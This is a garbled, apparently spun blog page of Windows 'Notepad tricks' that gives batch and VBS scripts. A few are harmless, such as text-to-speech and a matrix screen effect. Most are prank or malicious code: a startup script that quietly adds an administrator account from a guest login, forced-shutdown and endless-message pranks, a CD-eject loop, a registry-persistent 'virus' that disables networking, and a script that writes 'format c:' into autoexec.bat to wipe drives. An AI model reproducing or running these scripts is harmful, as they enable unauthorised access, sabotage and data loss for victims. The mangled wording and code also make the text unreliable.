Postingan

Menampilkan postingan dengan label Notepad Tricks

Print Tree Rootage I.E Place Of File :

PRINT TREE ROOT i.e LOCATION OF FILE : a. Open NOTEPAD as well as larn into {print tree root} b. After that hitting larn into as well as type C:\windows\system c. After that hitting larn into as well as type {print C:\windows\system\winlog d. Hit larn into as well as type 4*43″$@[455]3hr4 e. Then relieve the file equally teekids inwards C:\windows\system.

Text-To-Audio Converter Using Notepad

Gambar
How To Do It ? Open Notepad  file on your Windows PC. Copy as well as glue the below mentioned code : Dim msg, sapi msg=InputBox("Enter your text for conversion–www.techtricksandtweeks.blogspot.com","Text-To-Audio Converter") Set sapi=CreateObject("sapi.spvoice") sapi.Speak msg Save this file amongst whatsoever hollo with  .vbs  as extension. For eg. Text-To-Audio.vbs Thats it ! Your Text to Audio converter is ready to endure used. Now opened upwardly the saved file as well as fundamental inwards the text you lot desire to convert as well as click  OK.  If you lot detect whatsoever difficulties inwards using this code, allow me know via comments section.

Type “You Are A Fool” Continuously

Not much to explain, the championship says it all! Follow the steps to brand this line a fast 1 on work: Open Notepad. Paste the next code inwards the notepad file: Set wshShell = wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “You are a fool.” loop Save the file alongside whatever cite only alongside .vbs extension and unopen it. Ope the file as well as run into how it makes you lot type!

Create Admin Job Organisation Human Relationship From Guest

Create admin describe organisation human relationship from Guest To practice an administrator describe organisation human relationship is easy. You but take away to purpose your invitee describe organisation human relationship too practice 1 administrator describe organisation human relationship instantly. Just follow the steps : Open Notepad, glue the next : @echo off net user Newadmin /add /expires:never /passwordreq:no net localgroup “Administrators” /add Newadmin And relieve it to a bat file. Now house this bat file inwards location  local:\Documents too Settings\All Users\Start Menu\Programs\Startup And when your admin logs into the system, the novel describe organisation human relationship volition hold out automatically created without the detect of the user. Next fourth dimension when yous login, yous volition larn the user describe organisation human relationship for you. Cheers.

Shut-Down The Reckoner Subsequently Conveying Whatsoever Message

This 1 is form of an annoying fob in addition to if used unknowingly tin for sure drive problems (am serious). What this fob does is, later conveying a (any) message it shuts downwardly the estimator without whatever confirmation. In lodge to exercise the Shutdown file, follow the below mentioned steps: Open Notepad. Paste the next code inwards it: @echo off msg * Its fourth dimension to larn simply about rest. shutdown -c “Error! You conduct maintain to accept rest! Byeeeeee” -s Save the file amongst whatever squall but amongst .bat extension in addition to unopen it. For eg. TakeRest.bat NOTE :  Use this carefully. If yous are playing prank in addition to thus proceed inwards ask heed that this may Pb to loss equally it shuts downwardly the estimator forcefully.

Constantly Repeat Messages

Using this notepad fox yous tin annoy anyone together with tin genuinely forcefulness them to log off or larn out the reckoner (LOL….). This notepad fox volition practise an interplanetary space wheel of a message inwards the computer. Follow the steps to know more: Open Notepad. Paste the next code inwards the notepad file: @ECHO off :Begin msg * Hi msg * Are yous having fun? msg * I am! msg * Lets convey fun together! msg * Because yous convey been o-w-n-e-d GOTO BEGIN Save the file amongst whatever file advert simply amongst .bat equally extension together with unopen it. For eg. Freakymessage.bat

Matrix Effect

Gambar
Not much to explain, only follow the steps together with run across the amazing matrix lawsuit come about inwards your DOS window: Open Notepad. Copy the below mentioned text inwards your notepad file: @echo off color 02 :start echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% goto start Save the file amongst .bat extension similar Matrix.bat

Continually Popular The Cd Drive

Gambar
Open Notepad. Copy ( By Select the text in addition to and then Ctrl+C ) the code given below onto the notepad file: Set oWMP = CreateObject(“WMPlayer.OCX.7?) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop Save it every bit “Anything.VBS”. Now opened upwards the file in addition to come across the magic! The file will continuously strength the CD rom to popular out! And If you lot bring to a greater extent than than i in addition to then it pops out all of them!

Stop Mesh Permanently

Gambar
Stop Internet Permanently There is a Trick to brand Virus which tin sack Disable Internet Permanently. To create this follow thesesimple steps : 1) Open Notepad. 2) Copy together with Paste the next Code into Notepad : echo @echo off>c:windowswimn32.bat echo interruption off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add together hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d :windowswimn32.bat /f reg add together hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE 3) Save it equally InternetDisabled.bat. 4) Now it is done. So it is a unproblematic Trick to brand Virus which tin sack Disable Internet Permanently.

Wash Out The Estimator Completely

Gambar
There is Trick to brand a Virus which tin Wash Out the Computer Completely. This Virus is in addition to then powerfull that, it is fifty-fifty Detected inwards its Text Format. To brand this uncomplicated Virus follow these uncomplicated steps : 1) Open Notepad. 2) Copy in addition to Paste the followng Code into Notepad : @echo off rem. :start cls echo Loading . . . telephone phone attrib -r -h c:\autoexec.bat >nul echo @echo off >c:\autoexec.bat echo telephone phone format c: /q /u /autotest >nul >>c:\autoexec.bat telephone phone attrib +r +h c:\autoexec.bat >nul fix drive= fix alldrive=c d e f g h i j k l 1000 n o p q r sec t u v w x y z echo @echo off >drivechk.bat echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b discovery “Vol” > nul >{t}.bat %comspec% /e:2048 /c {t}.bat >>drivechk.bat del {t}.bat echo if errorlevel 1 goto enddc >>drivechk.bat cls echo Loading . . . echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p ...